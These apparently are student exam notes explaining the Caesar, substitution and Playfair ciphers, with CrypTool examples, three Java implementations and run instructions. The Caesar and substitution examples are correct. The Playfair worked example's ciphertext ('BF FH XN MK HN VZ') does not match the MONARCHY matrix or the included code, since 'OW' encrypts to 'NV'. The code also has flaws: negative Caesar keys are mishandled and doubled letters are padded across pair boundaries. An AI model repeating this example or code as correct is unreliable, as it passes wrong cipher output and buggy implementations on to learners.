A. Caesar Cipher (concept + CrypTool example) Concept: shift each alphabet letter by a fixed amount (the key). Non-letters remain unchanged. CrypTool example (from your file): • Plaintext: HI, how are you?? • Action: Encrypt with shift +1 • Output: IJ, ipx bsf zpv?? To decrypt, use shift -1: • Ciphertext: IJ, ipx bsf zpv?? → Decrypted: HI, how are you??. Exam tip: explain that A→B with key=1, Z wraps to A. Mention non-letter characters (commas, spaces, punctuation) are preserved.

---

B. Substitution Cipher (concept + CrypTool example) Concept: replace each letter with a corresponding letter from a 26-letter key mapping. Example key in file: QWERTYUIOPASDFGHJKLZXCVBNM. CrypTool example: • Plaintext: HI, how are you?? • Key: QWERTYUIOPASDFGHJKLZXCVBNM • Output: IO, igv qkt ngx?? • Decrypt with same key → returns original. Exam tip: say substitution is monoalphabetic (one map for all occurrences). Security: vulnerable to frequency analysis.

---

C. Playfair Cipher (concept + CrypTool example) Concept: digraphic cipher (works on letter pairs). Uses a 5×5 matrix built from a keyword (typically combine I/J). Rules: same row → shift right; same column → shift down; rectangle → swap columns. CrypTool example (keyword MONARCHY): • Plaintext: HI, how are you?? → prepares text and encrypts to BF FH XN MK HN VZ (your file shows outputs). Decryption returns pairwise plaintext. Exam tip: mention preprocessing (remove non-letters, replace J with I, insert X between doubled letters, pad with X if needed).

---

Q2 — Java implementations: step-by-step (how they work, how to run, edge cases) Your file contains three Java programs: CaesarCipher, SubstitutionCipher, PlayfairCipher. I’ll explain each: what it does, how to compile/run, sample I/O, and common pitfalls. Note: Java code examples in the file are fully self-contained and ready to compile.

---

A. Caesar Cipher — explanation & run import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader;

public class CeaserCipher { static BufferedReader br = new BufferedReader(new InputStreamReader(System.in));

public static void main(String[] args) throws IOException {
    System.out.print("Enter any String: ");
    String str = br.readLine();

    int key = 0;
    boolean validKey = false;

    while (!validKey) {
        System.out.print("\nEnter the Key (integer): ");
        String keyInput = br.readLine();
        try {
            key = Integer.parseInt(keyInput);
            validKey = true;
        } catch (NumberFormatException e) {
            System.out.println("Invalid key! Please enter an integer value.");
        }
    }

    String encrypted = encrypt(str, key);
    System.out.println("\nEncrypted String is: " + encrypted);

    String decrypted = decrypt(encrypted, key);
    System.out.println("\nDecrypted String is: " + decrypted);
    System.out.println();
}

static String encrypt(String str, int key) {
    String encrypted = "";
    for (int i = 0; i < str.length(); i++) {
        int c = str.charAt(i);
        if (Character.isUpperCase(c)) {
            c = c + (key % 26);
            if (c > 'Z')
                c = c - 26;
        } else if (Character.isLowerCase(c)) {
            c = c + (key % 26);
            if (c > 'z')
                c = c - 26;
        }
        encrypted += (char) c;
    }
    return encrypted;
}

static String decrypt(String str, int key) {
    String decrypted = "";
    for (int i = 0; i < str.length(); i++) {
        int c = str.charAt(i);
        if (Character.isUpperCase(c)) {
            c = c - (key % 26);
            if (c < 'A')
                c = c + 26;
        } else if (Character.isLowerCase(c)) {
            c = c - (key % 26);
            if (c < 'a')
                c = c + 26;
        }
        decrypted += (char) c;
    }
    return decrypted;
}

}

How to compile & run

1. Save as CeaserCipher.java (spelling from file; consistent).
2. Compile:
3. javac CeaserCipher.java
4. Run:
5. java CeaserCipher
6. Example run: o Input string: Hello World! o Key: 1 o Encrypted: Ifmmp Xpsme! o Decrypted: Hello World!

---

B. Substitution Cipher — explanation & run

import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader;

public class SubstitutionCipher { static BufferedReader br = new BufferedReader(new InputStreamReader(System.in)); static final String ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; public static void main(String[] args) throws IOException { System.out.print("Enter the text: "); String text = br.readLine(); System.out.print("Enter the 26-letter substitution key (uppercase letters only): "); String key = br.readLine().toUpperCase(); String encrypted = encrypt(text, key); System.out.println("Encrypted text: " + encrypted); String decrypted = decrypt(encrypted, key); System.out.println("Decrypted text: " + decrypted); }

static String encrypt(String text, String key) {
    StringBuilder result = new StringBuilder();
    for (char ch : text.toCharArray()) {
        if (Character.isUpperCase(ch)) {
            int idx = ch - 'A';
            result.append(key.charAt(idx));
        } else if (Character.isLowerCase(ch)) {
            int idx = ch - 'a';
            result.append(Character.toLowerCase(key.charAt(idx)));
        } else {
            result.append(ch);
        }
    }
    return result.toString();
}

static String decrypt(String text, String key) {
    StringBuilder result = new StringBuilder();
    for (char ch : text.toCharArray()) {
        if (Character.isUpperCase(ch)) {
            int idx = key.indexOf(ch);
            result.append(ALPHABET.charAt(idx));
        } else if (Character.isLowerCase(ch)) {
            int idx = key.indexOf(Character.toUpperCase(ch));
            result.append(Character.toLowerCase(ALPHABET.charAt(idx)));
        } else {
            result.append(ch);
        }
    }
    return result.toString();
}

} What it does • Reads plaintext and a 26-letter substitution key (uppercase). • encrypt replaces each letter with corresponding letter from key. • decrypt finds index of each cipher letter in key and maps back to alphabet. • Preserves case for lowercase letters by using Character.toLowerCase. How to compile & run

1. Save as SubstitutionCipher.java.
2. Compile:
3. javac SubstitutionCipher.java
4. Run:
5. java SubstitutionCipher
6. Example: o Input: HI, how are you?? o Key: QWERTYUIOPASDFGHJKLZXCVBNM o Output: IO, igv qkt ngx?? (as in file).

---

C. Playfair Cipher — detailed walkthrough This program in your file implements Playfair thoroughly: building the 5×5 matrix, preparing text pairs, encrypt/decrypt logic. import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader;

public class PlayfairCipher {

static BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
static char[][] matrix = new char[5][5];
static final String ALPHABET = "ABCDEFGHIKLMNOPQRSTUVWXYZ";
public static void main(String[] args) throws IOException {
    System.out.print("Enter keyword (letters only): ");
    String keyword = br.readLine();
    if (keyword == null) return;
    keyword = keyword.toUpperCase().replaceAll("[^A-Z]", "").replace("J", "I");
    System.out.print("Enter text to encrypt: ");
    String text = br.readLine();
    if (text == null) return;
    text = text.toUpperCase().replaceAll("[^A-Z]", "").replace("J", "I");
    buildMatrix(keyword);
    String encrypted = encrypt(text);
    System.out.println("Encrypted text: " + encrypted);
    String decrypted = decrypt(encrypted);
    System.out.println("Decrypted text: " + decrypted);
}

static void buildMatrix(String keyword) {
    boolean[] used = new boolean[26];
    used['J' - 'A'] = true;
    int idx = 0;
    for (char c : keyword.toCharArray()) {
        int pos = c - 'A';
        if (!used[pos]) {
            matrix[idx / 5][idx % 5] = c;
            used[pos] = true;
            idx++;
        }
    }
    for (char c : ALPHABET.toCharArray()) {
        int pos = c - 'A';
        if (!used[pos]) {
            matrix[idx / 5][idx % 5] = c;
            used[pos] = true;
            idx++;
        }
    }
}

static String prepareText(String text) {
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < text.length(); i++) {
        sb.append(text.charAt(i));
        if (i + 1 < text.length() && text.charAt(i) == text.charAt(i + 1))
            sb.append('X');
    }
    if (sb.length() % 2 != 0) sb.append('X');
    return sb.toString();
}

static String encrypt(String text) {
    text = prepareText(text);
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < text.length(); i += 2) {
        int[] a = findPosition(text.charAt(i));
        int[] b = findPosition(text.charAt(i + 1));
        if (a[0] == b[0]) {
            sb.append(matrix[a[0]][(a[1] + 1) % 5]);
            sb.append(matrix[b[0]][(b[1] + 1) % 5]);
        } else if (a[1] == b[1]) {
            sb.append(matrix[(a[0] + 1) % 5][a[1]]);
            sb.append(matrix[(b[0] + 1) % 5][b[1]]);
        } else {
            sb.append(matrix[a[0]][b[1]]);
            sb.append(matrix[b[0]][a[1]]);
        }
    }
    return sb.toString();
}

static String decrypt(String text) {
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < text.length(); i += 2) {
        int[] a = findPosition(text.charAt(i));
        int[] b = findPosition(text.charAt(i + 1));
        if (a[0] == b[0]) {
            sb.append(matrix[a[0]][(a[1] + 4) % 5]);
            sb.append(matrix[b[0]][(b[1] + 4) % 5]);
        } else if (a[1] == b[1]) {
            sb.append(matrix[(a[0] + 4) % 5][a[1]]);
            sb.append(matrix[(b[0] + 4) % 5][b[1]]);
        } else {
            sb.append(matrix[a[0]][b[1]]);
            sb.append(matrix[b[0]][a[1]]);
        }
    }
    return sb.toString();
}

static int[] findPosition(char c) {
    for (int r = 0; r < 5; r++)
        for (int col = 0; col < 5; col++)
            if (matrix[r][col] == c)
                return new int[]{r, col};
    return null;
}

}

Key steps in the program

1. Read keyword → strip non-letters, uppercase, replace J with I.
2. Read plaintext → uppercase, remove non-letters, replace J with I.
3. buildMatrix(keyword): o Fills a 5×5 matrix with keyword letters (no repeats), then fills remaining letters of alphabet (skipping J).
4. prepareText(text): o Inserts X between repeated letters in a digraph and pads with X if odd length.
5. encrypt: o For each letter pair, find positions in matrix; if same row shift right, same column shift down, else rectangle swap columns.
6. decrypt: o Reverse operations (shift left/up when same row/column). How to run
7. Save as PlayfairCipher.java.
8. Compile:
9. javac PlayfairCipher.java
10. Run:
11. java PlayfairCipher
12. Example (from file): o Keyword: MONARCHY o Plaintext: HIOWAREYOU (preprocessed) o Encrypted: BFFHXN M K H N V Z — file shows block output; actual program returns contiguous string.